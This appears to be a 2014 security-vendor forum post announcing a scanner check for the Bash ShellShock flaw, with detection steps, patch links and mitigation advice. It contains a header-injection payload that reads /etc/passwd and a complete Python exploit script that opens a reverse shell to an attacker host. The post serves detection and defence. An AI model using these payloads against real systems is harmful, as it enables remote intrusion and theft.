fmc

New WAS QID 150134 for Bash Bug ShellShock

Discussion created by fmc on Sep 29, 2014

Hello All,


Please read this complete post regarding the new WAS QID 150134 for Bash Bug ShellShock. This QID will go live tonight (09/29/2014).


***PLEASE NOTE: We will be adding additional checks within the next day or so, that use a time delay payload and reports the vulnerability if the successful time delay is observed.***

 

Full details can be found below.

 

Description:


The ShellShock vulnerability allows an attacker to execute arbitrary commands by leveraging the fact that environment variables can be created with specially crafted values before calling Bash shell. For e.g. Injecting () {test;} ; echo; /bin/cat /etc/passwd in HTTP header injection reveals /etc/passwd file contents in the response.

 

Possible Consequences:


Environmental variables with an arbitrary name can contain any nefarious function which can potentially lead to network exploitation. The vulnerability is critical since any application hosted on web server using mod_cgi/mod_cgid module of Apache HTTP Server or code that calls the bash shell is vulnerable.

 

For example: The following is the python reverse shell exploit code.


A Reverse shell allows an attacker’s system located on the external network to gain unauthorized ingress access into the protected network.

 

import httplib,urllib,sys
if (len(sys.argv) < 4):
print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0]
print "Example: %s localhost /cgi-bin/test.cgi 10.10.20.11/80" % sys.argv[0]
exit(0)
conn = httplib.HTTPConnection(sys.argv[1])
reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]
headers = {"Content-type": "application/x-www-form-urlencoded", "test":reverse_shell }
conn.request("GET",sys.argv[2],headers=headers)
res = conn.getresponse()
print res.status, res.reason
data = res.read()
print data

 

Our WAS detection technique:


Here are the steps we take to detect the Shell Shock vulnerability.  We simulate the attack and report the vulnerability if an appropriate evidence of arbitrary command execution via bash injection is found.

1.    The test begins with injecting a User-Agent header with a payload for every unique URL PATH.

2.    Report the vulnerability if contents are found in the response.

3.    WAS test has an additional payload to circumvent popular WAF filters for shell injection payload.

 


Mitigation:


The ShellShock vulnerability affects Debian as well as other Linux distributions. Patch the vulnerable Operating System or replace bash with an alternate shell.  The following is the list of support information for applying an appropriate patch:

  1. Novel/SuSE - http://support.novell.com/security/cve/CVE-2014-6271.html
  2. Debian - https://www.debian.org/security/2014/dsa-3032
  3. Redhat/Fedora - https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2014-6271
  4. Centos - http://centosnow.blogspot.com/2014/09/critical-bash-updates-for-centos-5.html
  5. Ubuntu - http://www.ubuntu.com/usn/usn-2362-1/

Specific distribution list is available at http://distrowatch.com/

 

The major attack vectors that have been identified in this case are HTTP requests and CGI script. Disabling mod_cgi/mod_cgid and filter inputs to vulnerable services is recommended as well.


Additional References:


https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169

 

Thanks,

 

Frank

Outcomes